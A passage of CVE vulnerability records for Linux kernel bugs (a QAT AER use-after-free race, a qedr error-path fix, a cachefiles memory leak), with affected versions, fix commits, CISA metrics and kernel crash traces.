"lessThan": "daba62d9eeddcc5b1081be7d348ca836c83c59d7",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "8e81cd58aee14a470891733181a47d123193ba81",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "d03092550f526a79cf1ade7f0dfa74906f39eb71",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "4ae5a97781ce7d6ecc9c7055396535815b64ca4f",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "0c2cf5142bfb634c0ef0a1a69cdf37950747d0be",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "bb279ead42263e9fb09480f02a4247b2c287d828",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
},
{
"lessThan": "7d42e097607c4d246d99225bf2b195b6167a210c",
"status": "affected",
"version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/crypto/intel/qat/qat_common/adf_aer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.17"
},
{
"lessThan": "3.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: qat - resolve race condition during AER recovery\n\nDuring the PCI AER system\u0027s error recovery process, the kernel driver\nmay encounter a race condition with freeing the reset_data structure\u0027s\nmemory. If the device restart will take more than 10 seconds the function\nscheduling that restart will exit due to a timeout, and the reset_data\nstructure will be freed. However, this data structure is used for\ncompletion notification after the restart is completed, which leads\nto a UAF bug.\n\nThis results in a KFENCE bug notice.\n\n BUG: KFENCE: use-after-free read in adf_device_reset_worker+0x38/0xa0 [intel_qat]\n Use-after-free read at 0x00000000bc56fddf (in kfence-#142):\n adf_device_reset_worker+0x38/0xa0 [intel_qat]\n process_one_work+0x173/0x340\n\nTo resolve this race condition, the memory associated to the container\nof the work_struct is freed on the worker if the timeout expired,\notherwise on the function that schedules the worker.\nThe timeout detection can be done by checking if the caller is\nstill waiting for completion or not by using completion_done() function."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:16.054Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/daba62d9eeddcc5b1081be7d348ca836c83c59d7"
},
{
"url": "https://git.kernel.org/stable/c/8e81cd58aee14a470891733181a47d123193ba81"
},
{
"url": "https://git.kernel.org/stable/c/d03092550f526a79cf1ade7f0dfa74906f39eb71"
},
{
"url": "https://git.kernel.org/stable/c/4ae5a97781ce7d6ecc9c7055396535815b64ca4f"
},
{
"url": "https://git.kernel.org/stable/c/226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7"
},
{
"url": "https://git.kernel.org/stable/c/8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc"
},
{
"url": "https://git.kernel.org/stable/c/0c2cf5142bfb634c0ef0a1a69cdf37950747d0be"
},
{
"url": "https://git.kernel.org/stable/c/bb279ead42263e9fb09480f02a4247b2c287d828"
},
{
"url": "https://git.kernel.org/stable/c/7d42e097607c4d246d99225bf2b195b6167a210c"
}
],
"title": "crypto: qat - resolve race condition during AER recovery",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26974",
"datePublished": "2024-05-01T05:20:14.163Z",
"dateReserved": "2024-02-19T14:20:24.203Z",
"dateUpdated": "2025-05-04T09:01:16.054Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26743 (GCVE-0-2024-26743)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/qedr: Fix qedr_create_user_qp error flow
Avoid the following warning by making sure to free the allocated
resources in case that qedr_init_user_queue() fail.
-----------[ cut here ]-----------
WARNING: CPU: 0 PID: 143192 at drivers/infiniband/core/rdma_core.c:874 uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]
Modules linked in: tls target_core_user uio target_core_pscsi target_core_file target_core_iblock ib_srpt ib_srp scsi_transport_srp nfsd nfs_acl rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs 8021q garp mrp stp llc ext4 mbcache jbd2 opa_vnic ib_umad ib_ipoib sunrpc rdma_ucm ib_isert iscsi_target_mod target_core_mod ib_iser libiscsi scsi_transport_iscsi rdma_cm iw_cm ib_cm hfi1 intel_rapl_msr intel_rapl_common mgag200 qedr sb_edac drm_shmem_helper rdmavt x86_pkg_temp_thermal drm_kms_helper intel_powerclamp ib_uverbs coretemp i2c_algo_bit kvm_intel dell_wmi_descriptor ipmi_ssif sparse_keymap kvm ib_core rfkill syscopyarea sysfillrect video sysimgblt irqbypass ipmi_si ipmi_devintf fb_sys_fops rapl iTCO_wdt mxm_wmi iTCO_vendor_support intel_cstate pcspkr dcdbas intel_uncore ipmi_msghandler lpc_ich acpi_power_meter mei_me mei fuse drm xfs libcrc32c qede sd_mod ahci libahci t10_pi sg crct10dif_pclmul crc32_pclmul crc32c_intel qed libata tg3
ghash_clmulni_intel megaraid_sas crc8 wmi [last unloaded: ib_srpt]
CPU: 0 PID: 143192 Comm: fi_rdm_tagged_p Kdump: loaded Not tainted 5.14.0-408.el9.x86_64 #1
Hardware name: Dell Inc. PowerEdge R430/03XKDV, BIOS 2.14.0 01/25/2022
RIP: 0010:uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]
Code: 5d 41 5c 41 5d 41 5e e9 0f 26 1b dd 48 89 df e8 67 6a ff ff 49 8b 86 10 01 00 00 48 85 c0 74 9c 4c 89 e7 e8 83 c0 cb dd eb 92 <0f> 0b eb be 0f 0b be 04 00 00 00 48 89 df e8 8e f5 ff ff e9 6d ff
RSP: 0018:ffffb7c6cadfbc60 EFLAGS: 00010286
RAX: ffff8f0889ee3f60 RBX: ffff8f088c1a5200 RCX: 00000000802a0016
RDX: 00000000802a0017 RSI: 0000000000000001 RDI: ffff8f0880042600
RBP: 0000000000000001 R08: 0000000000000001 R09: 0000000000000000
R10: ffff8f11fffd5000 R11: 0000000000039000 R12: ffff8f0d5b36cd80
R13: ffff8f088c1a5250 R14: ffff8f1206d91000 R15: 0000000000000000
FS: 0000000000000000(0000) GS:ffff8f11d7c00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000147069200e20 CR3: 00000001c7210002 CR4: 00000000001706f0
Call Trace:
<TASK>
? show_trace_log_lvl+0x1c4/0x2df
? show_trace_log_lvl+0x1c4/0x2df
? ib_uverbs_close+0x1f/0xb0 [ib_uverbs]
? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]
? __warn+0x81/0x110
? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]
? report_bug+0x10a/0x140
? handle_bug+0x3c/0x70
? exc_invalid_op+0x14/0x70
? asm_exc_invalid_op+0x16/0x20
? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]
ib_uverbs_close+0x1f/0xb0 [ib_uverbs]
__fput+0x94/0x250
task_work_run+0x5c/0x90
do_exit+0x270/0x4a0
do_group_exit+0x2d/0x90
get_signal+0x87c/0x8c0
arch_do_signal_or_restart+0x25/0x100
? ib_uverbs_ioctl+0xc2/0x110 [ib_uverbs]
exit_to_user_mode_loop+0x9c/0x130
exit_to_user_mode_prepare+0xb6/0x100
syscall_exit_to_user_mode+0x12/0x40
do_syscall_64+0x69/0x90
? syscall_exit_work+0x103/0x130
? syscall_exit_to_user_mode+0x22/0x40
? do_syscall_64+0x69/0x90
? syscall_exit_work+0x103/0x130
? syscall_exit_to_user_mode+0x22/0x40
? do_syscall_64+0x69/0x90
? do_syscall_64+0x69/0x90
? common_interrupt+0x43/0xa0
entry_SYSCALL_64_after_hwframe+0x72/0xdc
RIP: 0033:0x1470abe3ec6b
Code: Unable to access opcode bytes at RIP 0x1470abe3ec41.
RSP: 002b:00007fff13ce9108 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: fffffffffffffffc RBX: 00007fff13ce9218 RCX: 00001470abe3ec6b
RDX: 00007fff13ce9200 RSI: 00000000c0181b01 RDI: 0000000000000004
RBP: 00007fff13ce91e0 R08: 0000558d9655da10 R09: 0000558d9655dd00
R10: 00007fff13ce95c0 R11: 0000000000000246 R12: 00007fff13ce9358
R13: 0000000000000013 R14: 0000558d9655db50 R15: 00007fff13ce9470
</TASK>
--[ end trace 888a9b92e04c5c97 ]--
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: df15856132bc837b512caa36d2227d2350cf64d8 Version: df15856132bc837b512caa36d2227d2350cf64d8 Version: df15856132bc837b512caa36d2227d2350cf64d8 Version: df15856132bc837b512caa36d2227d2350cf64d8 Version: df15856132bc837b512caa36d2227d2350cf64d8 Version: df15856132bc837b512caa36d2227d2350cf64d8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26743",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:28:14.309187Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:28:21.844Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.229Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5639414a52a29336ffa1ede80a67c6d927acbc5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/135e5465fefa463c5ec93c4eede48b9fedac894a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f31a244c753aacf40b71d01f03ca6742f81bbbc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95175dda017cd4982cd47960536fa1de003d3298"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bab8875c06ebda5e01c5c4cab30022aed85c14e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ba4e6d5863c53e937f49932dee0ecb004c65928"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/qedr/verbs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5639414a52a29336ffa1ede80a67c6d927acbc5a",
"status": "affected",
"version": "df15856132bc837b512caa36d2227d2350cf64d8",
"versionType": "git"
},
{
"lessThan": "135e5465fefa463c5ec93c4eede48b9fedac894a",
"status": "affected",
"version": "df15856132bc837b512caa36d2227d2350cf64d8",
"versionType": "git"
},
{
"lessThan": "7f31a244c753aacf40b71d01f03ca6742f81bbbc",
"status": "affected",
"version": "df15856132bc837b512caa36d2227d2350cf64d8",
"versionType": "git"
},
{
"lessThan": "95175dda017cd4982cd47960536fa1de003d3298",
"status": "affected",
"version": "df15856132bc837b512caa36d2227d2350cf64d8",
"versionType": "git"
},
{
"lessThan": "bab8875c06ebda5e01c5c4cab30022aed85c14e6",
"status": "affected",
"version": "df15856132bc837b512caa36d2227d2350cf64d8",
"versionType": "git"
},
{
"lessThan": "5ba4e6d5863c53e937f49932dee0ecb004c65928",
"status": "affected",
"version": "df15856132bc837b512caa36d2227d2350cf64d8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/qedr/verbs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/qedr: Fix qedr_create_user_qp error flow\n\nAvoid the following warning by making sure to free the allocated\nresources in case that qedr_init_user_queue() fail.\n\n-----------[ cut here ]-----------\nWARNING: CPU: 0 PID: 143192 at drivers/infiniband/core/rdma_core.c:874 uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\nModules linked in: tls target_core_user uio target_core_pscsi target_core_file target_core_iblock ib_srpt ib_srp scsi_transport_srp nfsd nfs_acl rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs 8021q garp mrp stp llc ext4 mbcache jbd2 opa_vnic ib_umad ib_ipoib sunrpc rdma_ucm ib_isert iscsi_target_mod target_core_mod ib_iser libiscsi scsi_transport_iscsi rdma_cm iw_cm ib_cm hfi1 intel_rapl_msr intel_rapl_common mgag200 qedr sb_edac drm_shmem_helper rdmavt x86_pkg_temp_thermal drm_kms_helper intel_powerclamp ib_uverbs coretemp i2c_algo_bit kvm_intel dell_wmi_descriptor ipmi_ssif sparse_keymap kvm ib_core rfkill syscopyarea sysfillrect video sysimgblt irqbypass ipmi_si ipmi_devintf fb_sys_fops rapl iTCO_wdt mxm_wmi iTCO_vendor_support intel_cstate pcspkr dcdbas intel_uncore ipmi_msghandler lpc_ich acpi_power_meter mei_me mei fuse drm xfs libcrc32c qede sd_mod ahci libahci t10_pi sg crct10dif_pclmul crc32_pclmul crc32c_intel qed libata tg3\nghash_clmulni_intel megaraid_sas crc8 wmi [last unloaded: ib_srpt]\nCPU: 0 PID: 143192 Comm: fi_rdm_tagged_p Kdump: loaded Not tainted 5.14.0-408.el9.x86_64 #1\nHardware name: Dell Inc. PowerEdge R430/03XKDV, BIOS 2.14.0 01/25/2022\nRIP: 0010:uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\nCode: 5d 41 5c 41 5d 41 5e e9 0f 26 1b dd 48 89 df e8 67 6a ff ff 49 8b 86 10 01 00 00 48 85 c0 74 9c 4c 89 e7 e8 83 c0 cb dd eb 92 \u003c0f\u003e 0b eb be 0f 0b be 04 00 00 00 48 89 df e8 8e f5 ff ff e9 6d ff\nRSP: 0018:ffffb7c6cadfbc60 EFLAGS: 00010286\nRAX: ffff8f0889ee3f60 RBX: ffff8f088c1a5200 RCX: 00000000802a0016\nRDX: 00000000802a0017 RSI: 0000000000000001 RDI: ffff8f0880042600\nRBP: 0000000000000001 R08: 0000000000000001 R09: 0000000000000000\nR10: ffff8f11fffd5000 R11: 0000000000039000 R12: ffff8f0d5b36cd80\nR13: ffff8f088c1a5250 R14: ffff8f1206d91000 R15: 0000000000000000\nFS: 0000000000000000(0000) GS:ffff8f11d7c00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000147069200e20 CR3: 00000001c7210002 CR4: 00000000001706f0\nCall Trace:\n\u003cTASK\u003e\n? show_trace_log_lvl+0x1c4/0x2df\n? show_trace_log_lvl+0x1c4/0x2df\n? ib_uverbs_close+0x1f/0xb0 [ib_uverbs]\n? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\n? __warn+0x81/0x110\n? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\n? report_bug+0x10a/0x140\n? handle_bug+0x3c/0x70\n? exc_invalid_op+0x14/0x70\n? asm_exc_invalid_op+0x16/0x20\n? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\nib_uverbs_close+0x1f/0xb0 [ib_uverbs]\n__fput+0x94/0x250\ntask_work_run+0x5c/0x90\ndo_exit+0x270/0x4a0\ndo_group_exit+0x2d/0x90\nget_signal+0x87c/0x8c0\narch_do_signal_or_restart+0x25/0x100\n? ib_uverbs_ioctl+0xc2/0x110 [ib_uverbs]\nexit_to_user_mode_loop+0x9c/0x130\nexit_to_user_mode_prepare+0xb6/0x100\nsyscall_exit_to_user_mode+0x12/0x40\ndo_syscall_64+0x69/0x90\n? syscall_exit_work+0x103/0x130\n? syscall_exit_to_user_mode+0x22/0x40\n? do_syscall_64+0x69/0x90\n? syscall_exit_work+0x103/0x130\n? syscall_exit_to_user_mode+0x22/0x40\n? do_syscall_64+0x69/0x90\n? do_syscall_64+0x69/0x90\n? common_interrupt+0x43/0xa0\nentry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x1470abe3ec6b\nCode: Unable to access opcode bytes at RIP 0x1470abe3ec41.\nRSP: 002b:00007fff13ce9108 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: fffffffffffffffc RBX: 00007fff13ce9218 RCX: 00001470abe3ec6b\nRDX: 00007fff13ce9200 RSI: 00000000c0181b01 RDI: 0000000000000004\nRBP: 00007fff13ce91e0 R08: 0000558d9655da10 R09: 0000558d9655dd00\nR10: 00007fff13ce95c0 R11: 0000000000000246 R12: 00007fff13ce9358\nR13: 0000000000000013 R14: 0000558d9655db50 R15: 00007fff13ce9470\n\u003c/TASK\u003e\n--[ end trace 888a9b92e04c5c97 ]--"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:29.287Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5639414a52a29336ffa1ede80a67c6d927acbc5a"
},
{
"url": "https://git.kernel.org/stable/c/135e5465fefa463c5ec93c4eede48b9fedac894a"
},
{
"url": "https://git.kernel.org/stable/c/7f31a244c753aacf40b71d01f03ca6742f81bbbc"
},
{
"url": "https://git.kernel.org/stable/c/95175dda017cd4982cd47960536fa1de003d3298"
},
{
"url": "https://git.kernel.org/stable/c/bab8875c06ebda5e01c5c4cab30022aed85c14e6"
},
{
"url": "https://git.kernel.org/stable/c/5ba4e6d5863c53e937f49932dee0ecb004c65928"
}
],
"title": "RDMA/qedr: Fix qedr_create_user_qp error flow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26743",
"datePublished": "2024-04-03T17:00:32.634Z",
"dateReserved": "2024-02-19T14:20:24.167Z",
"dateUpdated": "2025-05-04T08:55:29.287Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26840 (GCVE-0-2024-26840)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
cachefiles: fix memory leak in cachefiles_add_cache()
The following memory leak was reported after unbinding /dev/cachefiles:
==================================================================
unreferenced object 0xffff9b674176e3c0 (size 192):
comm "cachefilesd2", pid 680, jiffies 4294881224
hex dump (first 32 bytes):
01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace (crc ea38a44b):
[<ffffffff8eb8a1a5>] kmem_cache_alloc+0x2d5/0x370
[<ffffffff8e917f86>] prepare_creds+0x26/0x2e0
[<ffffffffc002eeef>] cachefiles_determine_cache_security+0x1f/0x120
[<ffffffffc00243ec>] cachefiles_add_cache+0x13c/0x3a0
[<ffffffffc0025216>] cachefiles_daemon_write+0x146/0x1c0
[<ffffffff8ebc4a3b>] vfs_write+0xcb/0x520
[<ffffffff8ebc5069>] ksys_write+0x69/0xf0
[<ffffffff8f6d4662>] do_syscall_64+0x72/0x140
[<ffffffff8f8000aa>] entry_SYSCALL_64_after_hwframe+0x6e/0x76
==================================================================
Put the reference count of cache_cred in cachefiles_daemon_unbind() to
fix the problem. And also put cache_cred in cachefiles_add_cache() error
branch to avoid memory leaks.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d Version: 9ae326a69004dea8af2dae4fde58de27db700a8d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26840",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:58:24.475717Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:17.204Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.702Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb5466783793e66272624cf71925ae1d1ba32083"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/037d5a949b0455540ef9aab34c10ddf54b65d285"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43eccc5823732ba6daab2511ed32dfc545a666d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94965be37add0983672e48ecb33cdbda92b62579"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b218e2f0a27a9f09428b1847b4580640b9d1e58"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/38e921616320d159336b0ffadb09e9fb4945c7c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9cac69912052a4def571fedf1cb9bb4ec590e25a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e21a2f17566cbd64926fb8f16323972f7a064444"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/cachefiles/cache.c",
"fs/cachefiles/daemon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cb5466783793e66272624cf71925ae1d1ba32083",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "037d5a949b0455540ef9aab34c10ddf54b65d285",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "43eccc5823732ba6daab2511ed32dfc545a666d8",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "94965be37add0983672e48ecb33cdbda92b62579",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "8b218e2f0a27a9f09428b1847b4580640b9d1e58",
"status": "affected",
